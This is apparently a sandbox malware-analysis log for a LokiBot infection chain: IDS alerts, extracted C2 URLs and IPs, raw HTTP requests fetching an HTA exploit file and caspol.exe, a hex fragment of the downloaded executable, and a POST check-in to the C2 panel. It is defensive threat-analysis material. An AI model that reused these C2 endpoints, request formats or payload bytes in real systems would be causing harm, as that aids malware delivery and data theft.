                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49227
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49213
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49214
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49189
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49225
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49210
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49228
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49236
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49233
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49241
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49169 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49202
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                    Source: Malware configuration extractorURLs: 94.156.177.41/simple/five/fre.php
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Nov 2024 06:56:45 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Last-Modified: Wed, 20 Nov 2024 01:04:28 GMT | ETag: "92a00-6274dbb521496" | Accept-Ranges: bytes | Content-Length: 600576 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 07 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 27 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 28 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02
                    Source: Joe Sandbox View | IP Address: 192.3.243.136
                    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                    Source: Joe Sandbox View | ASN Name: NET1-ASBG
                    Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49184 -> 192.3.243.136:80
                    Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.243.136 | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8896- | Connection: Keep-Alive | Host: 192.3.243.136 | If-Range: "2c850-6274dfb369376"
                    Source: global traffic | HTTP traffic detected: GET /55/caspol.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.243.136 | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 176 | Connection: close
